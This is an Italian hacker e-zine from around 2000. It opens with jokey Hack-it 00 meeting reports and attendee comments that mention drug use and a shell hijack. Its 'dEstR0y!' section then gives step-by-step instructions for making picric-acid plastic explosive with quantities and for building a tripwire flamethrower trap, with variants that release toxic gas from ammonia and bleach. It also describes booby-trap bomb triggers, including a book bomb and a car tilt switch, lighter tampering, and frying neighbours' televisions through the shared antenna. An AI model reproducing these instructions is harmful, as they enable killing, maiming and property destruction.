Poco prima ero stato al seminario sulla crittografia tenuto da un certo
Cerin0.....Se non ci siete stati avete fatto bene.......Okkei, arrivo in fondo
all'ala e conosco Mayhem.....Mitico mayhemuzzo, non so se in terra esista
qualcuno pi simpatico di lui....Bene, subito dopo mi viene presentato il
Duka che mi accoglie a piccoli schiaffi (alla faccia della nobilt  duca?:)))
okkei, andiamo fuori ed il Duka ci offre a tutti una birra (beh, i duka so
ricchi e questo  noto :) quindi Mayhem si avvicina a me e mi passa il suo
cell che suonava......

Io dico: "Ma chi ?" e lui: "Tu parla".....Vabbu, risponde una graziosa voce
femminile, alquanto inquietata dalle mia parole.....Diciamo che l'ho fatta un
po' inkazzare perch le avevo detto che il suo alessio :) stava al tavolo con
un altra, ma insomma :))))))......
Abbiamo chiacchierato un po' e poi siamo tornati alla postazione...Quindi
arriva un certo Prodigy, un tizietto tutto muscoloso che ci faceva da cane da
guardia al pc :) quando noi non c'eravamo, alla domanda: "ma dove dormi?",
lui mi ha risposto: "io non dormo".....Beh, non diceva bugie  stato tre 3
giorni senza dormire, complimenti :)...Ha chattato per circa 9 ore consecutive
sul nostro pc, ma tuttosommato  stato un bravo ragazzo :) dopo ho conosciuto
colui che assieme a me manda avanti la UIC, ovvero Tin_Man, non so se Tin a
tempo libero faccia il sollevatore di autocarri, fatto sta che  una massa
compatta di muscoli, mitico tin :)))))))))

Poi nei giorni seguenti abbiamo approfondito le nostre conoscenze con 
Baron-Sam,
ed abbiamo scoperto che la moglie fa bene a tenerlo a bacchetta :))) e con
Spin0ne, non parlo perch  padre di famiglia, quindi deve portare avanti una
certa immagine :P ma cmq non ho mai visto una persona simile, lui pi di tutti
mi ha dato l'impressione migliore, non saprei davvero come descriverlo cmq i
suoi figli sono fortunati ad averlo come padre :))).

Anche il barone  stato un tipo davvero intrigante hahahahahah non potrei
descriverlo perch  fatto tutto a modo suo e cmq  miticuzzo pure lui :)
(ciauz Christian).

Siamo poi andati al seminario sul reversing tenuto da +Malattia e LittleJo...
Arrivato alla parte riguardante il reversing su linux ho dovuto accompagnare
xoa a bere che senn si essiccava come un fico dentro alla sala da th, poi
abbiamo fatto un po' di casino e le signorine del forte si sono un po'
inkazzate e ci hanno intimatio di andre via.....Che brutta figura :)

Il seminario  continuato fuori e xoanon ha dato stavolta un contributo
positivo anzich negativo :)

Ah, ovviamente ho anche conosciuto Alt255 che  scomparso in modo inspiegabile
:), bellissimo l'incontro con lui, io stavo parlando con mayhem e lui si
avvicina a noi e dice: "avete visto Quequero?"...Mayehm lo guarda senza dirgli
che ero io :), io lo guardo e gli dico chiedo chi ....Poi gli diciamo di
cercarlo per il forte visto che sta in giro, solamente che la sua faccia
sconfortata e addolorata mi ha portato a svelarmi, se avesse avuto una faccia
pi felice forse non gliel'avrei detto di essere io :)))

Degna di nota la storia del: "ma si esce?", quando qualcuno si rivolgeva a te
in quel modo voleva sapere se si riusciva ad andare online, bene, immaginate
le nostre risposte: "no no che oggi fa freddo", "si si usciamo, ma quando fa
giorno", "no ma che scherzi! Ora fuori  pieno di zanzare", "No ora non mi va,
forse dopo" ecc.....

Il tutto era reso ilarico dal fatto che noi eravamo spontanei nel rispondere
tali cose finch ad un certo momento ci siamo posti il quesito: "ma perch
sti tizi vogliono sapere se usciamo? Che gli frega?"......hihihihi

Ho conosciuto anche il santo (che ha rischiato di prendere le botte perch
continuava a chiamarmi QueroQuero) ed il suo amico del quale non ricordo il
nome (chiedo venia)....Quindi abbiamo passato gli ultimi momenti insieme, ed
ho anche tenuto una mini lezione home-made di hacking.....hihihihi :), per
non dire poi le risate che ci siamo fatto con una persona che chiameremo
Pierk****, un nome fittizio ovviamente :P

Quindi  arrivato Genius e Ja Lai (finalmente ho conosciuto anche loro :),
quindi ci siamo fatti le ultime foto e siamo andati via, molto bello il mio
bacio con xoa hahahahahahahahahhaha beh, tutto qui se non erro, ovviamente
non sto a raccontarvi della belga che ho conosciuto e che era veramente bona,
neanche sto a raccontarvi di come s' inkazzato il tunisino alla 5 foglia di
maria presa dalle sue piante :) perch questa  un'altra storia.

Di fianco a noi c'erano dei tizi con la techno altissima (volume 10), tanto
per farvi capire la furbizia di tale gente leggetevi 'ste due righe:

Que: "Scusate potete abbassare un po' che noi stiamo per addormentarci?
Grazie!"
Tizio: "Si si certo".....Volume 1 (la musica era come un sibilo) 
Que: "Ho detto abbassare un po', mica spegnere tutto :)!"
Tizio: "Ah si grazie".....Volume 12 

D'oh!

---Quequero---

--------------------------------------------------------------[ HacK-it00 ]---
===] KALKUTTA'S STORY [=======================================================
-----[ Quequero ]-------------------------------------------------------------


Beh, un po' di spazio a kalkutta glielo dobbiamo dedicare altrimenti non vale!

Kalkutta  un personaggio un po' mistico, 1.80m per 80kili di peso, niente di
speciale, al primo momento che il pi l'aveva visto ci aveva detto: "lasciamo
20.000 a testa a kalkutta per il ritorno visto che mi pare il pi
responsabile", questo era dovuto al fatto che kalkutta in quel momento non
parlava visto che io ed eugenio avevamo pensato bene di impaurirlo un pochetto
per farlo stare calmo (come si fa con i bambini insomma :)....Dopo 12minuti
pi aveva fatto marcia indietro riguardo a: " il pi responsabile di noi",

Kalkutta in realt  profondamente buono se non che ha il vizio di vendicarsi
per qualunque cosa 100volte pi pesantemente dello scherzo che gli fai....In
quei giorni aveva dormito con me per terra assieme agli scorpioni e alle
scolopendre, ed ogni tanto nel sonno si alzava dicendo cose tipo: "perch a
lui l'abbracci e a me no"...Oppure: "Eug, Eug, Eug, xyzzxyxzyyxyzyxyzyxyyz"
......La cosa pi bella per  stata quando il master Kalkutta si  alzato ed
ha iniziato a dire: "Rag, prima  arrivato morfeus e se n' cascato per terra
poi si  rialzato tutti inkazzato xyxyxzyxzyzyxyzy" e poi ripiombava giu a
dormire, molto bello anche quando inziava delle discussioni completamente
fantastiche con noi, su fatti avvenuti solo nella sua mente.........

Hihihi, non vi dico le risate che ci siamo fatti. C' da dire che calcutta
era di religione protestante e non fumava e per telefono mi aveva chiesto:
"ma succede qualcosa se non fumo? La mia religione mi impone di non farlo ecc.
"....Parole SUE, nessuno lo aveva costretto a fumare, finch una sera lui
entra nel giro e inizia a farsi un tiro......due, tre, quattro, cinque.......

....Per staccarlo abbiamo dovuto picchiarlo, non solo, chi per disgrazia
capitava nel giro prima di lui era finito, io ho avuto questa sfortuna......

Faccio un tiro...due (con molta calma che stavo navigando e non c'era fretta)
al terzo tiro si inkazza come un picchio irlandese e inizia ad attaccarsi a
me stile fantozzi per portarsi via la canna.........La prende ed in 1/3 di
secondo si fa qualcosa come 10-12 tiri e non la voleva passare, era diventata
sua (conversione Protesante->Rasta) per non dire poi come si era attaccato al
cilotto (aka silo) di pi, non potevi toglierglielo dalle mani che ti si
avventava contro come un cane rabbioso, porka miseria, sembrava che c'aveva
la colla alle mani, l'unico problema era che con un tiro lui stava gi finito
e quando kalkutta sta finito mena, e 80kg di persona che menano e ridono a
crepapelle sono pericolosi, era per questo che cercavamo di tenerlo lontanto
dal fumo, solo che pi lo tenevamo lontato pi lui studiava tutti gli
escamotage per poter fumare, ora di nascosto, ora prima degli altri, ora da
solo ecc.....Un drogato con la "D" maiuscola!

Finito qui? NOOOOOOOOO! Kalkutta  anche diventato gay, mi spiego, kalkutta
non ha mai avuto una ragazza, anzi, ha pure subito il trauma di vedersi
portar via da un tizio la donna che pi amava, cos non ha mai baciato una
donna, il caso ha voluto che in quei 4 giorni la musica techno era su per 24
ore al giorno effettive e lui aveva inziato a dare strani segni, del tipo:

immaginatevi un orologio che segna le 12:15, bene, io dormivo nella direzione
delle 15 e lui delle 12, non so come ma una notte me lo sono ritrovato sopra
che si agitava come un maialino siciliano........

Come se non bastasse, una mattina si alza e dice: "ma io AMO la musica techno,
fino a ieri mi faceva schifo, io ora la AMO con tutto me stesso, voglio i cd
techno....

Hei, ma Pinna fa musica techno, io AMO Pinna, perch non m'ha dato il cidd...
....oh noooooo ora Pinna  andato via nooooooooooooo".....era diventato
tristissimo, al ritorno dall'hackit aveva addirittura cercato di barattare il
numero di telefono di Pinna con due schede di rete.....Vi rendete conto?
Due schede di rete 10/100 per un numero di telefono, e poi diceva cose del
tipo: "Io vorrei vivere con Pinna,  il mio idolo".......Ecccccc.......

Morale: non andate mai a nessun hack meeting con un amico che abbia una
personalit poco forte :PPPP altrimenti rischierete di dovero tornare con una
specie di alieno e soprattutto NON ASCOLTATE MAI LA MUSICA TECHNO, i danni
che provoca sono evidenti credo :)

Ciauzzzzzzzzzzzzzzzz

---Quequero---

--------------------------------------------------------------[ HacK-it00 ]---
===] I COMMENTI [=============================================================
-----[ OldirOn61 ]------------------------------------------------------------


Alla richiesta di rilasciare un piccolo commento sull'hack-it da inserire su 
AiS3 gli intervistati hanno risposto cosi':

=] ANONIMO [=

<****> uhmmmmm......brevissimo?

<Old1> si, possibilmente

<****> beh..   1 una figata..
<****> un botto di gente... e di fighe...
<****> un posto stupendo... pareva un covo di pirati medioevale..
<****> non organizzato benissimo, rete che andava e veniva, sniffer
       piantati nei gateway; e sinceramente sta cosa non mi  piaciuta
       molto :/
<****> sono entrate le telecamere del tg1
<****> e non mi  piaciuto sentirmi dire: t'ho visto al tg1 stamattina
<****> poi....
<****> i momenti che mi son + piaciuti di sicuro son stati..
<****> Nobody88 che s' addormentato con il dito medio alzato
<****> poi......TheDuke e Mayhem...che trasmettevano insieme in radio..
<****> e poi, dal punto di vista teknico..
<****> quando ci siamo hijackati una persona che all'hack-it faceva
       troppo lo sgargiante...e quando s' visto apparire sulla sua shell:
       "provo a rootartela io?" ha incominciato a gastemare in aramaico 
<****> Preferisco non fare nomi...ma era giusto per fargli capire...di 
       abbassare un p la cresta, che di certo non  il + bravo sulla terra :)
<****> per la cronaca
<****> a te lo dico..
<****> era Roul Chiesa
<****> fankulo a lui e l'hacking senza etica che FA
<****> in kulo a lui e tutti quelli come lui...se la meritava :P

=] LOPKS [=

<lopks> ben organizzato , ma alcuni seminari , tipo quello
<lopks> delTCP/IP e quello sulla sicurezza di base
<lopks> erano troppo semplici e poco tecnici

=] VECNA [=

<vecna> l'hackit00 e' stato veramente bello a me e` piaciuto un sacco, i
        seminari erano belli, il posto favoloso, peccato x i cavi rovinati e
        per i pirla che facevano arp hijacking
<vecna> anzi, l'arp hijacking in se e` una cosa di tutto rispetto, il problema
        si pone quando qualcuno si e` messo a hijackare il gateaway
<vecna> il se era ben organizzato, peccato x i seminari che sono saltati, la
        birra costava di meno dell'anno scorso xo`, come ogni hackit vieni vai
        con 1000 progetti ma poi ti diverti cosi` tanto che non si fa` mai
        niente se non cose particolarmente organizzate
<vecna> una delle cose + belle dell'hackit e' vedere il decadimento fisico
        delle gambe del NaiL^d0d, il primo giorno camminava, il terzo lo
        portavamo a braccietto, di quanto e' stato seduto non camminava + :PP

=] MAYHEM [=

<mAyhEm> senza dubbio il risultato di un certo impegno da parte degli 
         organizzatori,alta la partecipazione, sia come numero che 
         emotivamente
<mAyhEm> diversi corsi ben curati, unica pecca qlc problema con la rete
<mAyhEm> per il resto una bella esperienza... troppo breve :(
<mAyhEm> beh direi che come sempre
<mAyhEm> indipendentemente dagli scopi sulla carta, si e' rivelata una grande
         occasione per passare del tempo assieme e cosolidare conoscenze/
         amicizie; cio' che mi ha molto colpito  l'assoluta civilta' nella
         quale si e' svolto il tutto
<mAyhEm> di solito, quando si riunisce una tale quantita' di gente
<mAyhEm> nascono sempre alcuni casini... piccole risse, furtarelli, litigi
<mAyhEm> la scomparsa di un disco e di un banco di ram a parte

<Old1>   e di un cilotto (il mio!) :(

<mAyhEm> direi che la capacita' di vivere assieme di tutti
<mAyhEm> mi ha decisamente impressionato, non mi aspettavo che andasse cosi'
         bene :)
<mAyhEm> mi spiace per il tuo cilotto :(

<Old1>   e vabbe'

<mAyhEm> direi che basta cosi', cita anche il mio dispiacere per il cilotto;P)
<mAyhEm> :)

=] PR0DIGY [=

<Pr0digY> strafigo per l'ambientazione cyberpunk e per una parte della gente
          che c'era
<Pr0digY> una merda dal punto di vista della rete e dei corsi

=] LO SMILZO [=

<Old1> me lo dai un brevissimo commento sull'hack-it?

<Smilzo> mhh
<Smilzo> kewl

<Old1> forse un po' TROPPO BREVE....

<Smilzo> mi e' piacuto l'ambientazione
<Smilzo> iperrumoroso

=] SMAV [=

<smav> l`acccchit e` stato un bel modo x conoscere e farmi conoscere... e x 
       imbrattare ankora d + la gente... e x conoscere OldirOn61 che mi sta 
       simpatico ma mi piaglia x scema ehehehhe =*

---OldirOn61---

###########################################################################
#######  GGGG   OOO   OOO  DDD    SSSS  TTTTTT U    U FFFFFF FFFFFF #######
####### G      O   O O   O D  D  S        TT   U    U F      F      #######
####### G   GG O   O O   O D   D  SSSS    TT   U    U FFF    FFF    #######
####### G    G O   O O   O D  D  S    S   TT   U    U F      F      #######
#######  GGGG   OOO   OOO  DDD    SSSS    TT    UUUU  F      F      #######
###########################################################################

---------------------------------------------------------------[ dEstR0y! ]---
===] LIGHTERS OVERCLOCKING ]==================================================
-----[ ]CyB0rG[ ]-------------------------------------------------------------

SpEcIaL tnX: )Senara(  -  +MassicciO+
FuCk OfF: Docto  -  RLP  -  J.F.

Della serie 'non ho meglio da fare' ;)) eccomi qua con uno dei miei soliti
inutili (?) articoli, questa volta vi spieghero' una cosa che presumo sappiano
tutti (non l'ho mica inventata io) ma, puo' comunque tornare utile: come
overclockare l'accendino a gas. Vi vedo gia' stupiti no, no! non passate al 
prox. articolo spe'...


Premetto che cio' non si puo' fare con tutti i tipi di accendini in commercio
bensi' con quelli che vendono + o - i vu cumpra': ovvero gli accendini 
trasparenti colorati con la levetta per poter regolare la fiamma.

Materiale occorrente:

1 Accendino a gas (sopra descritto)
1 Cacciavite (opzionale ma utile se non volete distruggervi le mani) 

 !!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!                     !                                                  !
!   1.   .----.,      !   2.      ,,                                     !
!        | #   |)     !        _i(||)       .-.--.                       !
!       =|-----'HHh   !      =|-----'HHh   ( O )[])                      !
!        |#######|    !       |#######|    |.-.|  |                      !
!        |'!'|...|    !       |'!'|...|    || ||  |  <-Parte metallica   !
!        | ! |   |    !       | ! |   |    ||_||__|                      !
!        | ! |   |    !       | ! |   |                                  !
!        | ! |   |    !       | ! |   |                                  !
!        | ! |   |    !       | ! |   |   <-Accendino senza la           !
!        | ! |   |    !       | ! |   |     parte metallica              !
!        |   | ::|    !       |   | ::|                                  !
!         '''''''     !        '''''''                                   !
!                     !                                                  !
 !!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!         _                        !                                     !
!   3.   ( ) <- Particolare        !   4.   .~.                          !
!         |     della levetta      !       { o } <- Particolare          !
!               di controllo       !        '~'     (ingrandito rispetto !
!               della valvola      !                la fig. n3) della   !
!               (vista dall'alto)  !                valvola del gas      !
!                                  !                                     !
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!




Procedimento:

1- Toglite dall'accendino la parte metallica (senza romperla: poi vi servira'!
   bastera' fare leva col cacciavite all'interno del condotto perche' questa 
   si allarghi leggermente e vi restera' in mano) [Fig. 2.]
2- Alzate leggermente la levetta di controllo della valvola per la fuoriuscita
   del gas [Fig. 3] (solitamente nera) e (senza far ruotare la valvola 
   [Fig. 4.]
   (solitamente bianca)) riportatela alla posizione di regolamento piu' bassa 
   (indicata con '-' o 'MIN')
3- Riabbassate la levetta di controllo
4- Adesso alzate (come fareste normalmente) la fiamma portando la levetta alla
   posizione max. 
5- Rialzate la levetta e riportatela alla mosizione min. senza muovere la 
   valvola
6- Ripetete gli ultimi passi sino a quando non vi sareste stancati ;)))
7- Rimettete la parte metallica all'accendino e stringetela ad esso con le 
   mani
   (meglio con una pinza)
8- Adesso, stando attenti alle vostre belle manine :-), accendete la fiamma 
   (che
sara' alta abbastanza)

Generalmente per spegnerlo adesso non dovrete fare altro che soffiare forte 
sul
punto di fuoriuscita del gas poiche' il sistema di controllo della fuoriuscita
del gas e' andato a farsi benedire. Non tenete la fiamma accesa piu' di 1
minuto o vi ritroverete le mani bruciate e, dopo circa 1 minuto la plastica
dell'accendino inizia a fondere... rischiate che vi scoppi in mano o di
ritrovarvi i vestiti incendiati.

Sembra difficile ma non ci vuole un cazzo e, se lo fate una volta vedrete che 
poi
non e' nemmeno tanto pericoloso... ovviamente per usi ed abusi vi rimando al
disclaimer.

bye
---]CyB0rG[---


---------------------------------------------------------------[ dEstR0y! ]---
===] IL PLASTICO FATTO IN CASA ]==============================================
-----[ The Raven ]------------------------------------------------------------

Questo esplosivo deriva dal Fenolo. E' tossico e forma acido pirico
se inalato, ingerito, maneggiato o assorbito attraverso la pelle.
La tossicita' restringe l'uso di questa miscela perche' se si e'
intossicati si puo' morire se non ci sono cure immediate. Ma noi ce ne
sbattiamo allegramente le palle, usiamo i guanti e alcune altre
precauzioni che vi diro'...

Questo esplosivo e' cugino del T.N.T. ma e' PIU' POTENTE. Fu il primo
esplosivo militare nel 1888. Oggi lo si puo' fabbricare in meno di
tre ore.

OCCORRENTE:
- "acetylsalicylic acid", in breve un acido che si ottiene dall'
  aspirina (poi vi spiego come)
- Acido solforico puro al 98%, gravita' specifica 1.8
- nitrato di sodio o di potassio

Viene chiamato Trinitrofenolo, ma noi lo chiameremo "plastico all'
aspirina", o TNF. Va conservato in contenitori di vetro a tenuta
stagna, e ASSOLUTAMENTE VA TENUTO LONTANO DA QUALSIASI METALLO
ad eccezione dell'alluminio, in quanto genera sali tossici super
sensibili (ed esplosivi pure loro) che faranno detonare il TNF.

Allora: l'aspirina. Le marche economiche vanno benissimo, anzi sono
consigliate. Polverizza qualche pasticca. Per ottenere l'acido di cui
sopra, bisogna sciogliere la polvere in alcool "methyl", o METILICO
(mmm devo controllare la traduzione) e mischiare vigorosamente. Non
tutta la polvere si sciogliera'. Filtra questa dall'alcool. Lavala con
altro alcool ma meno di quello di prima. Ripeti la procedura. Ora
mischia l'alcool e fallo evaporare in un piatto. Rimarranno dei
cristalli.

Prendine 40 gr e scioglili in 150 ml di acido solforico, e riscalda
per sciogliere tutti i cristalli.

Questa parte dovrebbe essere fatta all'aperto, o con un buon sistema di
ventilazione. Aggiungi lentamente 58 gr di nitrato di sodio o 77 gr di
nitrato di potassio (salnitro anymore?) all'acido, e mischia bene. Si
formera' un fumo rosso (triossido di nitrato - "nitrogen trioxide"),
evitate qualsiasi contatto. Fermatevi se l'acido sta per uscire dal
contenitore. Quando avete finito, lasciatela raffreddare, almeno
fino a 30=B0C. La soluzione va versata lentamente nel doppio del suo
volume in acqua e ghiaccio. Si formeranno cristalli gialli in acqua.
Questi devono essere filtrati e messi in 200 ml di acqua distillata
bollente. Lasciate raffreddare e rifiltrate i cristalli. Ora avete
TNF purissimo. Vanno conservati in un piatto pirex in olio ad una
temperatura di 80=B0C per due ore. La temperatura va mantenuta costante
e controllata con un termometro. Ora polverizzali e aggiungi il 10%
(in peso) di cera e il 5% di vaselina in fusione, e impasta bene con
le mani (PROTETTE DA GUANTI).

L'esplosivo resta plastico da 0 a 40=B0C,
ha una velocita' di detonazione intorno ai 7000 m/s, quindi ad alto
impatto. E' tossico da maneggiare ma si fa facilmente con ingredienti
comuni ed e' adatto nella demolizione. E' molto adatto per cariche
di forme particolari. Non e' potente come il C4 o altri esplosivi
basati sull'RDX ma piu' potente del TNT, e molto + facile da fare in
casa. Ancora una volta, e' tossico: non maneggiare a mani nude ne'
inalare. EVITARE IL CONTATTO CON QUALSIASI METALLO TRANNE L'ALLUMINIO.

the_raven@libero.it
www.raven.3000.it

Fonte: The Punisher
Traduzione:

---The Raven---

---------------------------------------------------------------[ dEstR0y! ]---
===] FLAMETHROWER TRAP. ]=====================================================
-----[ X_Ted ]--[Broken Shell Crew]-------------------------------------------

QUESTO TESTO E' A TITOLO PURAMENTE INFORMATIVO: QUALSIASI UTILIZZO ILLEGALE DI
QUESTE INFORMAZIONE NON E' DA IMPUTARSI A ME.
SE VI FATE MALE O NE FATE AD ALTRI NON E' COLPA MIA.

Il lanciafiamme e' gia' stato illustrato da ]CyB0rG[  nel numero 2 di Ais,
questa che segue ne e' una semplice ma efficace applicazione.

Occorrente:
- bomboletta spray ( deodorante o altro)
- accendino che rimanga acceso anche senza dover tenere il pulsante
  schiacciato (zippo)
- elastico resistente e piuttosto grosso (dipende dal tipo di bomboletta
- stecca di legno (quella dei ghiaccioli e' ok)
- filo di nyoln
- scotch + un qualcosa che faccia da separatore, di materiale non 
  infiammabile.

1. Prendete la bomboletta spray e con l'elastico fate in modo che il tappino
   sia sempre schiacciato e spruzzi continuamente.
2. Infilate la stecca di legno tra il tappino e la bomoletta in modo da
   impedirgli di spruzzare
3. Prendete l'accendino attaccatelo assieme al separatore in modo che la sua
   fiamma sia sulla traettoria di uscita del gas della bomboletta, ma
   abbastanza distante dal tappino da non rischiare di fonderlo.
4. Legate una estremita' del filo alla stecca di legno e l'altra estremita'
   ad una porta o in un altro posto in cui possa essere facilmente tirato
   dalla vittima.
5. Accendete l' accendino e scappate.

Quando qualcuno tirera' involontariamente il filo la stecca di legno si
togliera' e l'elastico potra' schacciare il tappino. Questo iniziera' a
spruzzare gas che verra' infiammato dall' accendino piazzato sulla sua
traettoria. Ricordatevi di piazzare la bomboletta in modo che sia stabile e
che non si ribalti appena la stecca di legno viene strattonata!

Disegni opzionali (anche perche' poco comprensibili).

BOMOBLETTA NORMALE
     __
    |  |  <--tappo
    |__O <-- buco da cui esce il gas  
   __||__  <-- il collegamento tra la bomoletta e il tappino deve essere    
  |  BO  |     scoperto
  |  MB  | 
  |  OL  |
  |  ET  | <-- bomboletta   
  |  TA  |  
  |______| 
     

1.   __     :::::::::::
    |# O..;:::::::::::   <--- spruzzo
   _|#_|    :::::::::::     
  |  #   | 
  |  #   |   
  |  # <--------elastico   
  |  #   | <-- bomboletta   
  |  #   |  
  |__#___| 
     

2.
             __
            |# O  
            |#_| 
     ========#|__
legno -^  |^^#   |
          |  #   | 
          |  #   |
          |  #   | <-- bomboletta   
          |  #   |  
          |__#___| 
     
3.	   

             __       !
            |# O      !! <-- fiamma 
            |#_|     !!!
     ========#|__    _||%_o------|
          |^^#   |  |     |______|
          |  #   |[]|zippo|
          |  #   |[]|_____| 
          |  #   | ^-------- isolante
          |  #   |  
          |__#___| 
     	   



4 e 5.  		
             __       !  
            |# O      !! <-- fiamma 
            |#_|     !!!
 -----=======#|__    _||%_o------|
 ^- filo  |^^#   |  |     |______|
          |  #   |[]|zippo|
          |  #   |[]|_____| 
          |  #   |
          |  #   |  
          |__#___| 
     	   
IN FUNZIONE.                !!!   !
                     ::!!!!!!!!!!!!! 
             __    ::!!!!!!!!!!!!!!!!  <-- fiamme
            |# O .::!!!!!!!!!!!!!
 -======== _|#_|_    _||%_o------|
 ^- legno |  #   |  |     |______|
 staccato |  #   |[]|zippo|
          |  #   |[]|_____| 
          |  #   |
          |  #   |  
          |__#___| 
     	   


Variabili divertenti ( se cosi' si puo' dire).

Cloro. (OCCHIO CHE E' UN GAS PERICOLOSISSIMO) 
Create del cloro mischiando  Ammoniaca e Varechina in una bottiglia, poi
mettete un palloncino sul collo della bottiglia raccoliendo il coloro
(procedimento descritto in MY PERSONAL COOKBOOK! di Avatar666).

Mettete poi il palloncino sulla traettoria del gas, ma distante dall'accendino
altrimenti scoppiera' prima del previsto.
Sempre con il palloncino del cloro potete fare una modifica alla trappola.
Castruite tutto come scritto sopra ma saltate il punto 3: incastrate invece
uno spillo nell'apertura del tappino. Quando la stecca verra' tolta l'ago
partira' e se avete ben posizionato il palloncino, mandera' in giro il Cloro.
Queste due varianti non le ho ancora sperimente. 

---X_Ted [Broken Shell Crew]---


---------------------------------------------------------------[ dEstR0y! ]---
===] INNESCHI PER ESPLOSIVI ]=================================================
-----[ The Raven ]------------------------------------------------------------

 
La maggior parte di queste idee sono prese dal libro

 L'artificiere (the tick tock man)
                   di  Terence Strong

L'ho divorato! Leggetelo, anche se tutte le idee utili le ho
trascritte qui (ma un paio sono mie). Non ho solo copiato, quel
bastardo ha tagliato quasi tutte le info davvero utili... Di base c'ha
messo le idee, io le realizzo.

Il circuito di cui si parla di seguito e' semplicissimo:


OOOOOOOOO------------pila o alimentatore--------interruttore
O bomba O                                  (o innesco: quelli
OOOOOOOOO                                  qua sotto in pratica)
  I                                                  I
  \--------------------------------------------------/

Ecco gli inneschi:
* cellula fotoelettrica
E' un componente elettrico che normalmente blocca la corrente, ma la
fa passare in presenza di luce. Mettete questo tra alimentatore ed
esplosivo e quando la zona sara' illuminata... BOOM!

* materassino
Avete presente quei cuscinetti gonfiabili che quando li premete fanno
"squeak"? Bene, togliete il fischietto, mettete al suo posto una
cannuccia. La cannuccia dovra' terminare all'interno di un contenitore
e soffiera' aria su due lamelle metalliche (alluminio ad esempio) in
modo che quando soffia, le due si toccano e chiudono il circuito.
Segue schema ASCII

    I
    V

/------\         /--------\
I      I         I   _ ___I circuito
I      =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D | i  I
\------/         I        I
materassino      \--------/
con cannuccia     contenitore

Lo so fa schifo ma usate un po' di fantasia. Bene, quando qualcuno
cammina sopra il vs materassino, la cannuccia soffia sulla lamella di
alluminio che tocca l'altro polo, il circuito si chiude... BUM!
Piazzate il materassino sotto una mattonella, sotto la sabbia...

* cartoncino nel libro
Classico pacco-bomba: scavate all'interno del libro in modo da metterci
abbastanza esplosivo + l'alimentatore, e fate in modo che l'
interruttore siano due lamelle separate da un cartoncino che esce dal
libro: quando uno lo sfila... inutile dirlo!

* Bulbo al mercurio
Questo e' bellissimo: si tratta di un piccolo contenitore pieno per
meta' di mercurio, che come sappiamo conduce elettricita', essendo un
metallo. Nell'altra meta', poco sopra il mercurio, ci saranno i due
poli del solito circuito, che pero' NON TOCCANO il mercurio.
ecco lo schema:

     V-------------
     V   __________
  ___V___V__
 /   V   V  \
/            \
I~~~~~~~~~~~~I      ~ =3D mercurio
I~~~~~~~~~~~~I
\____________/

Cosa succede? Quando il tutto si agita, il mercurio entra in contatto
coi due poli chiudendo il circuito... E basta un piccolo urto!
Figuriamoci se lo montiamo su un'automobile...

* assicella nella molletta
Questa e' davvero banale:

 _____________  sarebbe una molletta...
 \_____o____X/
  -----o =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3Dassicella
 /__________X\

Inutile dire che le due X sono i due poli e che si toccherebbero senza
l'assicella... Tutto sta a legare tale assicella ad un filo, che poi va
teso in terra o messo a mo' di interruttore (sapete, nelle cantine).
Ottimo per le mine.

* Interruttore
Questa e' proprio stupida (non nel senso di inefficace, pero'):
smontate la piastra dove c'e' l'interruttore della luce e prendete i
due fili. Attenzione che ci passa corrente! Tagliateli, e al posto
dell'interruttore fateli andare a finire all'esplosivo... Che potrete
nascondere anche lontano. In un bagno pubblico non dev'essere male.

Okay, credo di avervi dato abbastanza idee. Gia' che ci sono, vi do'
anche un altro paio di dritte dal libro, che pero' non riguardano
gli interruttori. Le metto qui perche':
1) Sono info non complete
2) Sono troppo poche per un nuovo file.

Ecco qui:
L'idrossido di sodio (SOH-  -?-) prende fuoco a contatto con l'acqua
 Indovinate cosa si puo' fare... Fumogeno + impianto antiincendio
 a pioggia... Io non vi ho detto niente...

ricetta: ANS. nitrato d'ammonio (fertilizzante) e zucchero a velo.
Purtroppo non dice le quantita'. Lo zucchero ha il solo compito di
frenare la combustione. Dovrebbe innescarsi con l'elettricita' e col
calore, ma non ne sono sicuro.

the_raven@libero.it
www.raven.3000.it

---The Raven---

---------------------------------------------------------------[ dEstR0y! ]---
===] TV IN TILT?? ]===========================================================
-----[ ]CyB0rG[ ]------------------------------------------------------------

Hihihihihihi! Non prendetevela con me per la mole di righe 
pazze che pubblico su questa zine: e' solo colpa della mia
mente malata. Questa volta vi spieghero' qualcosa che a mio
parere puo' essere realmente utile (beh! per me anche le 
altre cose che ho trattato non erano del tutto inutili =):
come fare bruciare tutti i televisori del vostro condominio!!
Come al solito vi vedo gia' con le vostre bocche spalancate,
vedo anche qualcuno che sta passando al prox. articolo =(
...tutto sommato puo' essere qualcosa di divertente.
(non so se altre zine lo hanno gia' pubblicato... a me lo ha
insegnato il mio tecnico televisivo (grande Marco G.!))

>Materiale Occorrente<

1 Presa maschio per antenna televisiva
1 Filo elettrico con una presa 220

Tutto qui? S, almeno: mi pare ovvio che dovrete avere un presa
al muro per l'antenna televisiva e una presa elettrica.

>Danger!<

Ricordate di scollegare dall'antenna condominiale tutti i
televisori del vostro appartamento, altrimenti andranno bruciati 
anch'essi. Dopo che farete tutto  molto probabile che la 
corrente elettrica si stacchi automaticamente nel vostro 
appartamento... questo potrebbe fare insospettire gli altri 
condomini nel vedervi scendere a riattaccarla (forse se avete un
salvavita evitate 'sta fatica).



  ...''''''-.
 (o) )       ).
  ''',,,,,,-'                                              '
                                                             
                                                              
      ..--------.                                             
 ()((((|         :                                           
     | |         .:                                        .
     | |         :' 
     | |         ':
 ()((((|         : 
      ''--------'

>Procedimento<

Prendete un filo elettrico e collegategli da una parte la presa
maschio dell'antenna e dall'altra la presa elettrica. Staccate 
i vostri televisori dall'antenna centrale e collegate il cavetto 
da voi costruito rispettivamente a una presa elettrica e alla presa
a muro dell'antenna condominiale. Zap! I tubi catodici dei vostri 
'amati' condomini saranno andati in fuori uso ;DDD. Vi consiglio di fare
tutto nelle ore in cui la gente e' sicuramente a casa poiche', 
purtroppo, oramai chiunque sta in casa ha sicuramente il tv acceso
(Grande Fratello!) meglio ancora se lo fate quando c'e' Sanremo (bleah!),
